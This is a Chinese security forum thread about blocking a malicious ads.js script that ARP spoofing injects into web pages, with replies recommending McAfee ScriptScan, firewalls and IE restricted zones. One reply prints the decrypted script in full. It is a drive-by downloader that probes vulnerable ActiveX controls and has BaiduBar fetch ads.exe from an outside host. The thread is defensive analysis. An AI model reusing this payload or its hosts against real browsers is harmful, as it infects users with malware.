如何预防恶意HTTP对象 <http://g.asdafdgfgf.com/ads.js>

sltht1

如何定义 8.5i规则预防HTTP对象 <http://g.asdafdgfgf.com/ads.js>呀！！！！

大猫熊

呵呵~这个是ARP攻击以后在浏览网页里插入的~我家也有~8.5i对这个无能为力~用防火墙之类的可以挡，如果用IE上网的话，试试在internet选项里面的安全里面，受限站点，把它添加进去，如果不行就装一个ARP的防火墙吧！

深红的雪

hxxp://g.asdafdgfgf.com/ads.js 解密后：

1. if(document.cookie.indexOf('OKSUN')==-1){try{var e;var ado=(document.createElement("object"));ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='OKSUN=SUN;path=/;expires='+expires.toGMTString();document.write("<\/script>");if(e!="[object Error]"){document.write("<\/script>")}else{try{var f;var storm=new ActiveXObject("MPS.StormPlayer")}catch(f){};finally{if(f!="[object Error]"){document.write("<\/script>");document.write("")}}try{var g;var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")}catch(g){};finally{if(g!="[object Error]"){document.write("<\/script>");document.write("")}}try{var h;var thunder=new ActiveXObject("DPClient.Vod")}catch(h){};finally{if(h!="[object Error]"){document.write("<\/script>");document.write("")}}try{var i;var yahoo=new ActiveXObject("GLCHAT.GLChatCtrl.1")}catch(i){};finally{if(i!="[object Error]"){document.write("")}}try{var j;var obj=new ActiveXObject("BaiduBar.Tool")}catch(j){};finally{if(j!="[object Error]"){obj.DloadDS("http://k.222360.com/ads/ads.cab","ads.exe",0);document.write("")}}if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"&&i=="[object Error]"&&j=="[object Error]"){document.write("")}}}}

复制代码

这个用我的规则包就能防住。

其实咖啡默认的设置和ScriptScan就能有不错的防护效果了

通用规则包就有禁止HTTP通信的功能！不知道是否有效

大猫熊

mcafee当然防得住，不用规则就用script scan都行，关键问题是如何不让恼人的警报框总是出现，这种被ARP攻击了的电脑上什么网都会显示警报，估计楼主所问的是这个问题。而且。。。。。楼主难道和我住一个小区？怎么连这种带毒的网址都是一样的？。。。